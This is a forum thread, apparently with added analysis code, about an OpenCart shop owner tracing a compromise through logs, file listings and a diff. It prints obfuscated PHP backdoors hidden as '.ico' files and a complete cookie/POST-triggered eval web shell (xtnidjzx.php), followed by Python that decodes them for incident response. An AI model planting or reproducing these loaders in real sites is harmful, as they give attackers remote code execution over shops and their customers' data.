Post by head_dunce » Sat May 11, 2019 8:54 pm

So I grepped through all the Apache logs, and I only came across 3 times where there is a POST to the installer. So I'm assuming there have only ever been 3 extensions installed. Correct?

Code: Select all

209.59.90.198 - - [08/May/2019:01:42:10 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=INEqC1uLyaTDcErW9oqZBiyPyYYDBZGL HTTP/1.1" 200 177 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=INEqC1uLyaTDcErW9oqZBiyPyYYDBZGL" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"

193.169.87.26 - - [10/Apr/2019:15:39:47 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe HTTP/1.1" 200 177 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

193.169.87.26 - - [10/Apr/2019:15:43:05 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo HTTP/1.1" 200 177 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
And here are the 2 binary files; note their dates, which rule out the last extension installed (the twig dump).
/admin

Code: Select all

----------   1 apache apache 8.2M May  3 10:02 3.02_conf
/catalog/view

Code: Select all

----------  1 apache apache 8.2M May  9 03:19 3.02_conf

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020


Active Member

Posts

Joined
Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 9:16 pm

Well this is interesting...

Code: Select all

[root@opencart system]# ls -lha /var/www/html/system
total 112K
drwxr-xr-x.  6 apache apache  223 May 10 19:37 .
drwxr-xr-x.  6 root   root    144 May  1 21:45 ..
-rw-r--r--   1 apache apache  30K Dec  3 01:01 .798c18ee.ico
-rw-r--r--   1 apache apache  33K Jan 14 02:45 .c2ea66bb.ico
drwxr-xr-x.  3 apache apache  145 Apr 11 04:09 config
drwxr-xr-x.  2 apache apache  191 May  5 00:24 engine
-rw-r--r--.  1 apache apache  18K Jan  5 16:16 framework.php
drwxr-xr-x.  2 apache apache   76 Apr 11 04:09 helper
-rw-r--r--.  1 apache apache  117 Jan  5 16:16 .htaccess
-rwxr-xr-x   1 apache apache  141 Aug  3  2018 index.php
drwxr-xr-x. 12 apache apache 4.0K Apr 11 04:09 library
-rw-r--r--.  1 apache apache 1.2K Jan  5 16:16 modification.xml
-rw-r--r--.  1 apache apache 3.2K Jan  5 16:16 startup.php
-rw-r--r--   1 apache apache 1.8K Apr 10 19:35 xtnidjzx.php
What are .798c18ee.ico and .c2ea66bb.ico and xtnidjzx.php ?


Post by head_dunce » Sat May 11, 2019 9:18 pm

Code: Select all

[root@opencart system]# cat .798c18ee.ico
<?php
$_udfcv9j = basename/*j*/(/*rpq*/trim/*0k7*/(/*nr*/preg_replace/*veih*/(/*xu*/rawurldecode/*zl802*/(/*rwx2*/"%2F%5C%28.%2A%24%2F"/*7hibw*/)/*916*/, '', __FILE__/*jlo*/)/*n*//*i7p*/)/*1d*//*w*/)/*o9g*/;$_rla6c = "GQ%19%10BU%5D%03%0C%40%0C%07G%09DMJ%06PU%3A%06A%07%17%0AVCf%5B%11TY%11%00%0ENJF%24L3%5C%06WQ%0B%00%06N%10%1B%5CRXU%3CRW%0B%11K%11%170ME%5CY%17T%18BI%0EXJT%24%3D%19%1C%04%5EO%09%02%0ETC%5D%16%03%0F%03CWM%0B%06Z%00%0C%01%0ENJT%08%5CR%07M%0A%11%04%1A_Z%

--- had to take out the center chunk, too long for a forum post ---

%09%3CDC%0E%10_%1F%5E%0F%1F%5CB%02ID%06%09%0A%07%1F%17%16%14EBFN%5EQ%09g%1E%14C%16SBX%10N%14H%02%17%1ERD%0C%06B%17%09ECHC%10%04%06Dw%1FIE%09%05DR%10%10%0F%1FO%11%1F%0AB%13WD%25%09%1B%19%1F%0D%16%05%5BB%1DNOO%09F%1E%05%5D%16%7DBI%0EN%13H%13%09%1EPD%1D%18B%16%09T%5DHt%10%15%18DC%1FX%5B%09%3ADC%0E%10L%1F%5E%0F%1F4B%02ID%1B%09%0A%07%1F%22%16%14EBYN%5EQ%09%5C%1E%14C%16NBX%10NQH%02%17%1EAD%0C%06B%14%09ECHV%10%04%06Dg%1FIE%09%13DR%10%10%5D%1FJ%0A2%00%13O%05LE%5DXI%5D%0C%5B%5DOJ%06%10%10%03EZSZK%15I%16%14_%02%1A%0A%02%17%1DT%02HY%09%08Z%40JT%24J";eval/*n*/(/*9hk1*/rawurldecode/*n*/(/*zfv2*/$_rla6c/*f7owp*/)/*re65*/ ^ substr/*p8u7l*/(/*cqf*/str_repeat/*bgsnc*/(/*n2r6*/$_udfcv9j, /*5i*/(/*y3nw6*/strlen/*r49*/(/*klw1b*/$_rla6c/*z*/)/*g8ik*//strlen/*4*/(/*d8w*/$_udfcv9j/*y9u*/)/*i7z*//*9m0*/)/*fo*/ + 1/*2u3*/)/*8tq*/, 0, strlen/*y*/(/*f*/$_rla6c/*sax*/)/*l*//*v32zp*/)/*xjon*//*s6v8w*/)/*1*/;


Post by head_dunce » Sat May 11, 2019 9:18 pm

Code: Select all

[root@opencart system]# cat .c2ea66bb.ico
<?php
$_l8q09b = basename/*axn*/(/*iz*/trim/*x*/(/*m1*/preg_replace/*9gy*/(/*27sqp*/rawurldecode/*8zh10*/(/*y8*/"%2F%5C%28.%2A%24%2F"/*i7was*/)/*2mb3*/, '', __FILE__/*2*/)/*rfqn*//*4b3*/)/*y*//*ot*/)/*nzc*/;$_zinlrm = "G%05%12M%40RS%04%0B%40%0C%07G%09%10F%17%04W%5B%3D%01A%07%17%0AV%17m%06%13SW%16%07%0ENJF%24%188%01%04P_%0C%07%06N%10%1B%5C%06S%08%3EUY%0C%16K%11%170M%11W%04%15S%16EN%0EXJT%24i%12A%07LT%05%16%0ETCZ%18P%0A%5EAPC%0C%01Z%00%0C%01%0E%0E%5C%04%03O%1EF%0EH%00%0E%04I%14F%17%19%1A%16F%05G%13%16%0C%07%18%16%04%0EQU%01B%13IDH%15CT%0A%13%1E%12%0B_%1ERCKGC%0EE%12BD%0E%07%40AG%03H%0A_%0E%06AB%10%1A%07RCKGH%19L%1A%12W%0D%05M%0ACA%13C%5B%16%12SBJFI%00%19%1AM8%16%09%07_%5B%09%05Y%1D%11%17uG%5B8%3C%1F%16%5DB%0A%0E%0A%15%5B%00iA%0DP_%0F%09I%1E%17%1DV8%16%0C%3Ck%16XB%0A%05%05%06C%08U%12%15DN9FG4X%12%24G%5B%16%17PF%1A_%0C%1B%02%18%5B%11%5EGA%18%16%40%06K%0A%0C%0BKA%09%17%04BC%10%0C%0EM%0A%1CX%05B%1DI%12W%0D%05M%0AJTSi%16%0D%15%5CO%0A%0FB%05%0E%1E%0E%5E%12BDu%7FG%21%7CL%20%26%0B%20%60%40%0Cuz%06.q0%0B8%0B%15Y%40%17_%5E44%17%3F%3C%1A%17%14%17%13%08%13%406GX%2A%06%16%5E%13%17%

--- took out center chunk, too long for forum post ---

F%1A%16E%2C%09T%5DHED%1EEFg%11_%5C%09%01DC%0EDbB%5C%08%11WE%02ID%3C%09%5E%0CB%2A%11%1ABE%7CN%5EQ%09%22%15IA%11cE_%10N%29H%02C%151F%0B%08E%21%09ECHyD%0F%5BFB%11NB%09%3FDR%10D%40BM%16%11%3BE%13WD%1C%09O%12B9%11%0B%5CEvNOO%099%15X_%11eEN%0EN%02H%13%5D%15VF%1A%16E%01%09T%5DHtD%1EEFT%11_%5C%09%1CDC%0EDWB%5C%08%11%2CE%02ID%0B%09%5E%0CB%0F%11%1ABEIN%5EQ%091%15IA%11PE_%10N3H%02C%15%0CF%0B%08EU%09ECHFD%0F%5BFS%11NB%09%02DR%10D%0ABM%16%11%08E%13WD%0D%09O%12B%0C%11%0B%5CE%1ANOO%09%0F%15X_%11gEN%0EN%0CH%13%5D%15%3CF%1A%16E%0C%09T%5DH%1FD%1EEFG%11_%5C%09%2FDC%0EDBB%5C%08%11.E%02ID%1C%09%5E%0CB%2C%11%1ABE%5CN%5EQ%09%12%15IA%11CE_%10N%0FH%02C%15%11F%0B%08E%14%09ECHYD%0F%5BFQ%11NB%09%1FDR%10D%00BM%16%11%1BE%13WD%3A%09O%12B%19%11%0B%5CEHNOO%09%19%15X_%11%5BEK%15c%06%19O%0F%1DO%08X%5CHM%06%04%0D%0EL%1A%1AA%09B%5C%1B%0AC%05%0F%02_O%12A%18O_%08%0AL%0C%05%1A%5DJ%1B%5EkK";eval/*8u*/(/*i*/rawurldecode/*kvr*/(/*4eop*/$_zinlrm/*2g*/)/*8q6*/ ^ substr/*5q*/(/*t3*/str_repeat/*u3*/(/*ntcs*/$_l8q09b, /*jn*/(/*m*/strlen/*sj*/(/*xogh*/$_zinlrm/*5e*/)/*eai7k*//strlen/*7*/(/*n2*/$_l8q09b/*z0*/)/*h*//*6n*/)/*2wgue*/ + 1/*ejl*/)/*s*/, 0, strlen/*wav7e*/(/*i3nc*/$_zinlrm/*m8l*/)/*tqcpl*//*sm3*/)/*d*//*m*/)/*e42x*/;


Post by head_dunce » Sat May 11, 2019 9:19 pm

Code: Select all

[root@opencart system]# cat /var/www/html/system/xtnidjzx.php
<?php
$bkrpkdl = '*glcxu7n#r8-\'29mtv64_isebyofkda13pH5';$rykhs = Array();$rykhs[] = $bkrpkdl[34].$bkrpkdl[0];$rykhs[] = $bkrpkdl[3].$bkrpkdl[10].$bkrpkdl[13].$bkrpkdl[32].$bkrpkdl[32].$bkrpkdl[18].$bkrpkdl[27].$bkrpkdl[10].$bkrpkdl[11].$bkrpkdl[27].$bkrpkdl[29].$bkrpkdl[31].$bkrpkdl[14].$bkrpkdl[11].$bkrpkdl[19].$bkrpkdl[18].$bkrpkdl[35].$bkrpkdl[29].$bkrpkdl[11].$bkrpkdl[30].$bkrpkdl[24].$bkrpkdl[31].$bkrpkdl[29].$bkrpkdl[11].$bkrpkdl[24].$bkrpkdl[10].$bkrpkdl[3].$bkrpkdl[14].$bkrpkdl[23].$bkrpkdl[6].$bkrpkdl[29].$bkrpkdl[32].$bkrpkdl[23].$bkrpkdl[14].$bkrpkdl[35].$bkrpkdl[24];$rykhs[] = $bkrpkdl[8];$rykhs[] = $bkrpkdl[3].$bkrpkdl[26].$bkrpkdl[5].$bkrpkdl[7].$bkrpkdl[16];$rykhs[] = $bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9].$bkrpkdl[20].$bkrpkdl[9].$bkrpkdl[23].$bkrpkdl[33].$bkrpkdl[23].$bkrpkdl[30].$bkrpkdl[16];$rykhs[] = $bkrpkdl[23].$bkrpkdl[4].$bkrpkdl[33].$bkrpkdl[2].$bkrpkdl[26].$bkrpkdl[29].$bkrpkdl[23];$rykhs[] = $bkrpkdl[22].$bkrpkdl[5].$bkrpkdl[24].$bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9];$rykhs[] = $bkrpkdl[30].$bkrpkdl[9].$bkrpkdl[9].$bkrpkdl[30].$bkrpkdl[25].$bkrpkdl[20].$bkrpkdl[15].$bkrpkdl[23].$bkrpkdl[9].$bkrpkdl[1].$bkrpkdl[23];$rykhs[] = $bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9].$bkrpkdl[2].$bkrpkdl[23].$bkrpkdl[7];$rykhs[] = $bkrpkdl[33].$bkrpkdl[30].$bkrpkdl[3].$bkrpkdl[28];foreach ($rykhs[7]($_COOKIE, $_POST) as $autsglw => $klanlh){function ucarg($rykhs, $autsglw, $ahnng){return $rykhs[6]($rykhs[4]($autsglw . $rykhs[1], ($ahnng / $rykhs[8]($autsglw)) + 1), 0, $ahnng);}function fndrpq($rykhs, $mtlbd){return @$rykhs[9]($rykhs[0], $mtlbd);}function zninvr($rykhs, $mtlbd){$woexid = $rykhs[3]($mtlbd) % 3;if (!$woexid) {eval($mtlbd[1]($mtlbd[2]));exit();}}$klanlh = fndrpq($rykhs, $klanlh);zninvr($rykhs, $rykhs[5]($rykhs[2], $klanlh ^ ucarg($rykhs, $autsglw, $rykhs[8]($klanlh))));}

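Taking the three loaders apart, as an added example that is not part of the posts (my own Python, not code from the thread, from the extension or from OpenCart). It rebuilds the $rykhs[] string table of xtnidjzx.php by indexing into the alphabet string exactly as the PHP does, spells out what the foreach/eval tail then calls, and provides the inverse transforms for both loader families so that a captured request parameter (xtnidjzx.php: hex-decoded value XORed with the parameter name plus a GUID, split on "#") or the blob from a .ico loader (percent-decoded, XORed with the file's own basename) can be read without executing it. The PHP excerpt embedded below is the posted loader re-wrapped one statement per line; the posted .ico blobs have their middle cut out, so the .ico decoder is exercised on a constructed byte string instead. keystream(...) in the readable reconstruction is a label for the str_repeat/substr expression, not a PHP function.

```python
import os
import re
from urllib.parse import unquote_to_bytes

# Constructed for this example: the loader from xtnidjzx.php as posted above,
# re-wrapped one statement per line.  The foreach/eval tail is left out because
# only the string-table construction is parsed from the source text.
SAMPLE_PHP = r"""<?php
$bkrpkdl = '*glcxu7n#r8-\'29mtv64_isebyofkda13pH5';
$rykhs = Array();
$rykhs[] = $bkrpkdl[34].$bkrpkdl[0];
$rykhs[] = $bkrpkdl[3].$bkrpkdl[10].$bkrpkdl[13].$bkrpkdl[32].$bkrpkdl[32].$bkrpkdl[18].$bkrpkdl[27].$bkrpkdl[10].$bkrpkdl[11].$bkrpkdl[27].$bkrpkdl[29].$bkrpkdl[31].$bkrpkdl[14].$bkrpkdl[11].$bkrpkdl[19].$bkrpkdl[18].$bkrpkdl[35].$bkrpkdl[29].$bkrpkdl[11].$bkrpkdl[30].$bkrpkdl[24].$bkrpkdl[31].$bkrpkdl[29].$bkrpkdl[11].$bkrpkdl[24].$bkrpkdl[10].$bkrpkdl[3].$bkrpkdl[14].$bkrpkdl[23].$bkrpkdl[6].$bkrpkdl[29].$bkrpkdl[32].$bkrpkdl[23].$bkrpkdl[14].$bkrpkdl[35].$bkrpkdl[24];
$rykhs[] = $bkrpkdl[8];
$rykhs[] = $bkrpkdl[3].$bkrpkdl[26].$bkrpkdl[5].$bkrpkdl[7].$bkrpkdl[16];
$rykhs[] = $bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9].$bkrpkdl[20].$bkrpkdl[9].$bkrpkdl[23].$bkrpkdl[33].$bkrpkdl[23].$bkrpkdl[30].$bkrpkdl[16];
$rykhs[] = $bkrpkdl[23].$bkrpkdl[4].$bkrpkdl[33].$bkrpkdl[2].$bkrpkdl[26].$bkrpkdl[29].$bkrpkdl[23];
$rykhs[] = $bkrpkdl[22].$bkrpkdl[5].$bkrpkdl[24].$bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9];
$rykhs[] = $bkrpkdl[30].$bkrpkdl[9].$bkrpkdl[9].$bkrpkdl[30].$bkrpkdl[25].$bkrpkdl[20].$bkrpkdl[15].$bkrpkdl[23].$bkrpkdl[9].$bkrpkdl[1].$bkrpkdl[23];
$rykhs[] = $bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9].$bkrpkdl[2].$bkrpkdl[23].$bkrpkdl[7];
$rykhs[] = $bkrpkdl[33].$bkrpkdl[30].$bkrpkdl[3].$bkrpkdl[28];
"""

ALPHABET_RE = re.compile(r"\$\w+\s*=\s*'((?:[^'\\]|\\.)*)';")
TABLE_ENTRY_RE = re.compile(r"\$\w+\[\]\s*=\s*((?:\$\w+\[\d+\]\.?)+);")


def php_unescape_single_quoted(s):
    # Inside PHP single quotes only \' and \\ are escape sequences.
    return s.replace("\\'", "'").replace("\\\\", "\\")


def recover_string_table(php_source):
    """Rebuild the $rykhs[] table by indexing into the alphabet string, as the PHP does."""
    m = ALPHABET_RE.search(php_source)
    if m is None:
        raise ValueError("no single-quoted alphabet string found")
    alphabet = php_unescape_single_quoted(m.group(1))
    table = []
    for entry in TABLE_ENTRY_RE.finditer(php_source):
        indexes = [int(i) for i in re.findall(r"\[(\d+)\]", entry.group(1))]
        table.append("".join(alphabet[i] for i in indexes))
    return table


def readable_loader(table):
    """Spell out the foreach/eval tail of xtnidjzx.php with the recovered names filled in."""
    h, guid, sep, count, _, explode, _, merge, _, pack = table
    return (
        f"foreach ({merge}($_COOKIE, $_POST) as $k => $v) {{ "
        f"$p = {explode}('{sep}', {pack}('{h}', $v) ^ keystream($k . '{guid}')); "
        f"if ({count}($p) % 3 == 0) eval($p[1]($p[2])); }}"
    )


def xor_keystream(data, key):
    """Repeating-key XOR, the primitive both loader families rely on (symmetric)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_captured_param(name, hex_value, table):
    """Replay xtnidjzx.php's transform on one logged cookie or POST parameter.

    Returns the exploded parts and whether count(parts) % 3 == 0, i.e. whether
    the backdoor would have gone on to eval($parts[1]($parts[2])).
    """
    guid, sep = table[1], table[2]
    plain = xor_keystream(bytes.fromhex(hex_value), (name + guid).encode())
    parts = plain.decode("latin-1").split(sep)
    return parts, len(parts) % 3 == 0


def ico_key(file_path):
    r"""Key used by the .ico loaders: basename(trim(preg_replace('/\(.*$/', '', __FILE__)))."""
    return os.path.basename(re.sub(r"\(.*$", "", file_path).strip())


def decode_ico_loader(file_path, urlencoded_payload):
    """Decode the rawurlencoded blob of a .798c18ee.ico-style loader (needs the real file name)."""
    data = unquote_to_bytes(urlencoded_payload)
    return xor_keystream(data, ico_key(file_path).encode()).decode("latin-1")


if __name__ == "__main__":
    table = recover_string_table(SAMPLE_PHP)
    for i, name in enumerate(table):
        print(f"$rykhs[{i}] = {name!r}")
    print(readable_loader(table))
```

Two things fall out of this that matter for the clean-up. The .ico loaders key their XOR on __FILE__, so copying one of them under a different name for analysis yields garbage; decode it under its original name, or pass that name explicitly as above. And the eval in xtnidjzx.php only fires when the decoded value splits into a multiple of three pieces, so a random parameter value does nothing and a casual probe of the file looks inert.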

Post by head_dunce » Sat May 11, 2019 10:02 pm

So I took the new clean install, tarred it, transferred it to the infected server, untarred it and ran diff to see the difference.
Taking out the thousands of images, I get this

Code: Select all

Only in html/admin: 3.02_conf
Files html/admin/config.php and clean/admin/config.php differ
Only in html/admin/controller/common: .68343cc2.ico
Only in html/admin/controller/design: image.php
Files html/admin/controller/extension/advertise/google.php and clean/admin/controller/extension/advertise/google.php differ
Only in html/admin/controller/extension: export_import.php
Files html/admin/controller/extension/extension/advertise.php and clean/admin/controller/extension/extension/advertise.php differ
Only in html/admin/controller/extension/fraud: sjqvatoo.php
Only in html/admin/controller/extension/module: cgdsobzv.php
Files html/admin/controller/extension/module/sagepay_direct_cards.php and clean/admin/controller/extension/module/sagepay_direct_cards.php differ
Files html/admin/controller/extension/module/store.php and clean/admin/controller/extension/module/store.php differ
Only in html/admin/controller/extension/module: wxkgcvwc.php
Files html/admin/controller/extension/payment/authorizenet_sim.php and clean/admin/controller/extension/payment/authorizenet_sim.php differ
Files html/admin/controller/extension/payment/squareup.php and clean/admin/controller/extension/payment/squareup.php differ
Files html/admin/controller/extension/payment/worldpay.php and clean/admin/controller/extension/payment/worldpay.php differ
Files html/admin/controller/extension/total/sub_total.php and clean/admin/controller/extension/total/sub_total.php differ
Only in html/admin/controller: index.php
Only in html/admin/controller/localisation: .7862a5a3.ico
Files html/admin/controller/sale/recurring.php and clean/admin/controller/sale/recurring.php differ
Only in html/admin: .e57becc0.ico
Only in html/admin: import.html
Only in html/admin: import.php
Files html/admin/index.php and clean/admin/index.php differ
Only in html/admin/language: .4558758b.ico
Files html/admin/language/en-gb/extension/advertise/google.php and clean/admin/language/en-gb/extension/advertise/google.php differ
Only in html/admin/language/en-gb/extension: export_import.php
Files html/admin/language/en-gb/extension/extension/payment.php and clean/admin/language/en-gb/extension/extension/payment.php differ
Files html/admin/language/en-gb/extension/payment/authorizenet_aim.php and clean/admin/language/en-gb/extension/payment/authorizenet_aim.php differ
Files html/admin/language/en-gb/extension/payment/authorizenet_sim.php and clean/admin/language/en-gb/extension/payment/authorizenet_sim.php differ
Files html/admin/model/catalog/attribute_group.php and clean/admin/model/catalog/attribute_group.php differ
Files html/admin/model/extension/advertise/google.php and clean/admin/model/extension/advertise/google.php differ
Only in html/admin/model/extension: export_import.php
Only in html/admin/model/extension: export_import.php.190425.bak
Only in html/admin/model/extension: .f5c5666b.ico
Only in html/admin/model/extension/openbay: njfmtrip.php
Files html/admin/model/extension/payment/worldpay.php and clean/admin/model/extension/payment/worldpay.php differ
Only in html/admin/model: index.php
Only in html/admin/model/setting: .20fddf86.ico
Only in html/admin: .pid
Only in html/admin/view/image: export-import
Only in html/admin/view/image: rbammkqc.php
Only in html/admin/view: index.php
Only in html/admin/view/stylesheet: export_import.css
Files html/admin/view/stylesheet/googleshopping/stepper.css and clean/admin/view/stylesheet/googleshopping/stepper.css differ
Files html/admin/view/template/catalog/product_form.twig and clean/admin/view/template/catalog/product_form.twig differ
Only in html/admin/view/template/design: xcqftzpo.php
Files html/admin/view/template/extension/advertise/google_ads.twig and clean/admin/view/template/extension/advertise/google_ads.twig differ
Files html/admin/view/template/extension/advertise/google_campaign.twig and clean/admin/view/template/extension/advertise/google_campaign.twig differ
Files html/admin/view/template/extension/advertise/google_popup_issues.twig and clean/admin/view/template/extension/advertise/google_popup_issues.twig differ
Files html/admin/view/template/extension/advertise/google.twig and clean/admin/view/template/extension/advertise/google.twig differ
Only in html/admin/view/template/extension: export_import.twig
Files html/admin/view/template/extension/extension/advertise.twig and clean/admin/view/template/extension/extension/advertise.twig differ
Files html/admin/view/template/extension/payment/authorizenet_sim.twig and clean/admin/view/template/extension/payment/authorizenet_sim.twig differ
Files html/admin/view/template/extension/payment/worldpay.twig and clean/admin/view/template/extension/payment/worldpay.twig differ
Only in html/catalog/controller/affiliate: image.php
Only in html/catalog/controller/api: .d9522978.ico
Only in html/catalog/controller/checkout: .ff3fe506.ico
Only in html/catalog/controller/checkout: nqoanzpw.php
Files html/catalog/controller/common/menu.php and clean/catalog/controller/common/menu.php differ
Only in html/catalog/controller/common: menu.php.ori.bak
Files html/catalog/controller/event/theme.php and clean/catalog/controller/event/theme.php differ
Files html/catalog/controller/extension/advertise/google.php and clean/catalog/controller/extension/advertise/google.php differ
Only in html/catalog/controller/extension/module: cgg_product_sort.php
Only in html/catalog/controller/extension/module: my_module.php
Only in html/catalog/controller/extension/module: post_order.php
Files html/catalog/controller/extension/payment/authorizenet_sim.php and clean/catalog/controller/extension/payment/authorizenet_sim.php differ
Files html/catalog/controller/extension/payment/twocheckout.php and clean/catalog/controller/extension/payment/twocheckout.php differ
Files html/catalog/controller/extension/payment/worldpay.php and clean/catalog/controller/extension/payment/worldpay.php differ
Only in html/catalog/controller: index.php
Only in html/catalog/controller/information: .ff8f5b4e.ico
Only in html/catalog/controller/mail: .03f37cbe.ico
Files html/catalog/controller/product/category.php and clean/catalog/controller/product/category.php differ
Only in html/catalog/controller/product: category.php.190426.bak
Files html/catalog/controller/product/product.php and clean/catalog/controller/product/product.php differ
Only in html/catalog/controller/product: product.php.190429.bak
Only in html/catalog/controller: seo.php
Files html/catalog/controller/startup/seo_url.php and clean/catalog/controller/startup/seo_url.php differ
Only in html/catalog/controller/startup: seo_url.php.ori.bak
Only in html/catalog/controller/startup: test.txt
Only in html/catalog: index.php
Only in html/catalog/language/en-gb/account: eobfsdnu.php
Only in html/catalog/language/en-gb/error: khdegtdn.php
Files html/catalog/language/en-gb/extension/advertise/google.php and clean/catalog/language/en-gb/extension/advertise/google.php differ
Files html/catalog/language/en-gb/extension/payment/paymate.php and clean/catalog/language/en-gb/extension/payment/paymate.php differ
Only in html/catalog/language/en-gb: yxpemcjh.php
Only in html/catalog/model: .93a45c39.ico
Files html/catalog/model/catalog/category.php and clean/catalog/model/catalog/category.php differ
Only in html/catalog/model/catalog: category.php.190424.bak
Only in html/catalog/model/catalog: category.php.190426.bak
Files html/catalog/model/catalog/product.php and clean/catalog/model/catalog/product.php differ
Only in html/catalog/model/catalog: product.php.190422.bak
Only in html/catalog/model/checkout: .065a7b3e.ico
Only in html/catalog/model: .e8f42ddc.ico
Files html/catalog/model/extension/advertise/google.php and clean/catalog/model/extension/advertise/google.php differ
Only in html/catalog/model/extension: mqtqfjcb.php
Files html/catalog/model/extension/payment/worldpay.php and clean/catalog/model/extension/payment/worldpay.php differ
Files html/catalog/model/extension/total/voucher.php and clean/catalog/model/extension/total/voucher.php differ
Only in html/catalog/model: index.php
Only in html/catalog/model: jqhftmrv.php
Only in html/catalog/model/setting: .3d608f54.ico
Only in html/catalog/model/setting: .48a042ea.ico
Only in html/catalog/model/tool: imgwm.php.suspected
Only in html/catalog/view: 3.02_conf
Only in html/catalog/view: index.php
Only in html/catalog/view/javascript/bootstrap: poajcjav.php
Only in html/catalog/view: .pid
Files html/catalog/view/theme/default/stylesheet/stylesheet.css and clean/catalog/view/theme/default/stylesheet/stylesheet.css differ
Files html/catalog/view/theme/default/template/common/header.twig and clean/catalog/view/theme/default/template/common/header.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_cart.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_cart.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_category.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_category.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_home.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_home.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_product.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_product.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_purchase.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_purchase.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_searchresults.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_searchresults.twig differ
Files html/catalog/view/theme/default/template/extension/payment/worldpay.twig and clean/catalog/view/theme/default/template/extension/payment/worldpay.twig differ
Only in html/catalog/view/theme: default_190509
Files html/config.php and clean/config.php differ
Only in html: .htaccess

Only in html/image/cache: category
Only in html/image/cache: images_product_additional

Only in html/image: category
Only in html/image: category_slideshows
Only in html/image: images_product_additional
Only in html/image: index.php
Only in html/image/payment: index.php
Files html/index.php and clean/index.php differ
Only in clean: install
Only in html/system: .798c18ee.ico
Only in html/system: .c2ea66bb.ico
Files html/system/config/catalog.php and clean/system/config/catalog.php differ
Only in html/system/config/googleshopping: .1f07a50d.ico
Files html/system/config/googleshopping/googleshopping.php and clean/system/config/googleshopping/googleshopping.php differ
Only in clean/system/config: index.html
Only in html/system/config: index.html.bak.bak
Only in html/system/config: index.php
Only in html/system/engine: .8265e171.ico
Only in html/system/engine: index.php
Files html/system/framework.php and clean/system/framework.php differ
Only in html/system/helper: index.php
Only in html/system: index.php
Only in html/system/library/cache: .3052a859.ico
Only in html/system/library/cache: .d69a2a1e.ico
Only in html/system/library/cart: rzxjpxgi.php
Only in html/system/library: export_import
Files html/system/library/googleshopping/cron_functions.php and clean/system/library/googleshopping/cron_functions.php differ
Files html/system/library/googleshopping/googleshopping.php and clean/system/library/googleshopping/googleshopping.php differ
Only in clean/system/library/googleshopping: log.php
Only in html/system/library: index.php
Files html/system/library/template/twig.php and clean/system/library/template/twig.php differ
Only in html/system/library: zdjhyzkv.php
Only in clean/system: var
Only in html/system: xtnidjzx.php
Only in html: test.txt
Only in clean: upload
What sticks out so far is this -
Only in html/admin/controller/design: image.php

And when I did a search for the heading comment tag I found this -
https://www.unphp.net/decode/3f86cd1314 ... ec7acf584/

Not sure what that is yet...

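Triaging that diff output by name, as an added example (my own Python, not the poster's tooling or anything from OpenCart). It parses "diff -rq clean html" style lines into extra, missing and modified entries and then labels the extra ones with the naming patterns visible in the listing above: hidden dotfiles with a .ico extension (the ones shown earlier start with <?php), eight-lowercase-letter .php names in directories that never contain such a file, .suspected quarantine renames, dated .bak copies sitting beside modified core files, and index.php dropped into directories where OpenCart ships index.html. The sample is a constructed subset of the posted listing and the labels are this example's own, so treat the heuristics as a first sort, not a verdict.

```python
import re
from collections import Counter

# Constructed sample: a subset of the diff output posted above, in the
# "diff -rq clean html" format (clean = fresh install, html = live tree).
SAMPLE_DIFF = """\
Only in html/admin: 3.02_conf
Files html/admin/config.php and clean/admin/config.php differ
Only in html/admin/controller/common: .68343cc2.ico
Only in html/admin/controller/design: image.php
Only in html/admin/controller/extension/fraud: sjqvatoo.php
Only in html/admin/model/extension: export_import.php
Only in html/admin/model/extension: export_import.php.190425.bak
Only in html/admin: .pid
Only in html/catalog/controller/common: menu.php.ori.bak
Only in html/catalog/model/tool: imgwm.php.suspected
Only in clean: install
Only in clean/system/config: index.html
Only in html/system/config: index.php
Only in html/system: xtnidjzx.php
Files html/system/framework.php and clean/system/framework.php differ
"""

ONLY_IN_RE = re.compile(r"^Only in (?P<dir>\S+): (?P<name>.+)$")
DIFFER_RE = re.compile(r"^Files (?P<live>\S+) and \S+ differ$")


def parse_diff_rq(text, live_root="html"):
    """Yield (status, path) per line: extra (live only), missing (clean only), modified."""
    for line in text.splitlines():
        m = ONLY_IN_RE.match(line)
        if m:
            top = m["dir"].split("/", 1)[0]
            status = "extra" if top == live_root else "missing"
            yield status, f"{m['dir']}/{m['name']}"
            continue
        m = DIFFER_RE.match(line)
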